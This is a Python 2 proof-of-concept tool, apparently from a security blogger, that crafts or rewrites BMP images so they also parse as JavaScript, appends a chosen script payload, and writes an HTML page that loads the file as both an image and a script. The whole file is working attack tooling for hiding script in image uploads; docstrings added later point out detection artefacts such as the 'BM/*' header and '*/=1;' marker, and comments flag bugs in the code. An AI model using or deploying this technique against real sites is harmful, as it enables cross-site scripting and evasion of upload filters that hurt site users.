#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a BMP. ====================================================#
#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import os
#---------------------------------------------------------
def _hexify(num):
	"""
	Return ``num`` as a raw byte string: format it as hex without leading
	zeros, left-pad to an even number of digits, then decode the hex.

	The width is therefore variable and big-endian: 5 -> one byte 0x05,
	300 -> two bytes 0x01 0x2C. The caller uses this for a BMP header
	field, so the byte count depends on the payload length.
	Python 2 only: ``str.decode('hex')`` does not exist on Python 3
	(``binascii.unhexlify`` is the equivalent there).
	"""
	num = "%x" % num
	if len(num) % 2:
		num = '0'+num
	return num.decode('hex')
#---------------------------------------------------------
#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
#;alert(_0xe428[0]);"
def _generate_and_write_to_file(payload, fname):
	"""
	Create ``fname`` from scratch: a hand-built BMP header followed by
	``payload`` written verbatim.

	What the header bytes below encode, which is what matters when triaging
	such a file: the 4-byte file-size field at offset 2 holds ``/*`` plus two
	NUL bytes, the last palette entry ends in 0x2A (``*``) and is followed by
	``/=1;``, so a JavaScript engine reads the file as
	``BM/* ...header bytes... */=1;<payload>``. ``BM`` immediately followed by
	``/*``, and a ``*/=1;`` sequence later in the header, are stable
	artefacts of this construction that a scanner can key on.

	payload: str (bytes on Python 2); appended as-is, not inspected.
	fname:   path to create; an existing file is truncated.
	Returns True. The handle is not closed if a write raises.
	"""
	f = open(fname, "wb")
	header = (b'\x42\x4D'  #Signature BM
						b'\x2F\x2A\x00\x00' #File size field, but its first two bytes are /* (0x2F 0x2A), which opens a JS block comment
						b'\x00\x00\x00\x00' #Reserved
						b'\x00\x00\x00\x00' #bitmap data offset
						b''+ _hexify( len(payload) ) + #bitmap header size. NOTE(review): _hexify yields 1 byte below 256 and 2 bytes below 65536, not a fixed 4-byte field, so the fields after it shift with the payload length; whether viewers still accept the file is not established here
					  b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
						b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
					  b'\x00\x00' #nb_plan
						b'\x00\x00' #nb per pixel
						b'\x00\x10\x00\x00' #compression type
						b'\x00\x00\x00\x00' #image size .. its ignored
						b'\x00\x00\x00\x01' #Horizontal resolution
						b'\x00\x00\x00\x01' #Vertical resolution
						b'\x00\x00\x00\x00' #number of colors
						b'\x00\x00\x00\x00' #number important colors
						b'\x00\x00\x00\x80' #palette entry, to be compliant
						b'\x00\x80\xff\x80' #palette entry, to be compliant
						b'\x80\x00\xff\x2A' #palette entry; its last byte 0x2A is the '*' of the closing '*/'
						b'\x2F\x3D\x31\x3B' #/=1;  -> together with the 0x2A above: */=1;
						)
	# I made this explicit, step by step .
	f.write(header)
	f.write(payload)
	f.close()
	return True
#---------------------------------------------------------
def _generate_launching_page(f):
	"""
	Write ``run.html`` into the current working directory.

	The page references ``f`` twice: once as an ``<img src>`` and once as a
	``<script src>``, i.e. the browser is asked to load the same file first
	as an image and then as JavaScript. From the defender's side that pairing
	(a script tag whose source is also used as an image) is the telling
	artefact of this technique.

	``f`` is pasted into both attributes with no HTML escaping. The ``<img>``
	tag ends in a backslash followed by ``>``: that backslash is not a Python
	escape sequence, so it is emitted literally. The file is opened in binary
	mode but given a ``str``, which works on Python 2 only.
	Returns True.
	"""

	htmlpage ="""
								<html>
								<head><title>Opening an image</title> </head>
								<body>
									<img src=\"""" + f + """\"\>
									<script src= \"""" + f + """\"> </script>
								</body>
								</html>
						"""
	html = open("run.html", "wb")
	html.write(htmlpage);
	html.close()
	return True
#---------------------------------------------------------
def _inject_into_file(payload, fname):
	"""
	Rewrite the existing BMP ``fname`` in place so that it also parses as
	JavaScript, then append ``payload``.

	Three passes over the same path, no backup of the original:
	1. read the whole file;
	2. truncate it, write the bytes back, and overwrite offsets 2-3 (the
	   first two bytes of the BMP file-size field) with ``/*``;
	3. append ``0xFF */=1;`` and then ``payload`` verbatim.
	The original pixel data thus ends up inside a JS block comment, and the
	header's size field no longer describes the file. For triage: a file
	starting with ``BM/*`` whose size field disagrees with its real length,
	or containing ``*/=1;`` followed by script text, matches this layout.

	NOTE: the original author warns that a BMP already containing the byte
	pair 2A 2F (``*/``, the pair targeted by the replace() below) might cause
	issues.
	Returns True.
	"""
	# I know, I can do it all in memory and much more fast.
	# I wont do it here.
	f = open(fname, "r+b")
	b = f.read()
	# str.replace returns a new string and the result is not stored, so b
	# still holds the file's original contents when it is written back below.
	b.replace(b'\x2A\x2F',b'\x00\x00')
	f.close()

	f = open(fname, "w+b")   # truncates fname
	f.write(b)
	f.seek(2,0)              # offset 2: start of the 4-byte file-size field
	f.write(b'\x2F\x2A')     # "/*"
	f.close()

	f = open(fname, "a+b")
	f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')   # 0xFF then "*/=1;"
	f.write(payload)
	f.close()
	return True
#---------------------------------------------------------
if __name__ == "__main__":
	# CLI: a positional output/target filename and the JS payload text;
	# -i switches from generating a new file to modifying an existing one.
	# run.html is written in the current directory in both modes.
	parser = argparse.ArgumentParser()
	parser.add_argument("filename",help="the bmp file name to be generated/or infected")
	parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
	parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
	args = parser.parse_args()
	print("""
					|======================================================================================================|
					| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
					| It is the end user's responsibility to obey all applicable local, state and federal laws.            |
					| Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
					|======================================================================================================|
					""")
	if args.inject_to_existing_bmp:
		 _inject_into_file(args.js_payload, args.filename)
	else:
		_generate_and_write_to_file(args.js_payload, args.filename)
	
	_generate_launching_page(args.filename)
	# Python 2 print statement: this file does not parse on Python 3.
	print "[+] Finished!"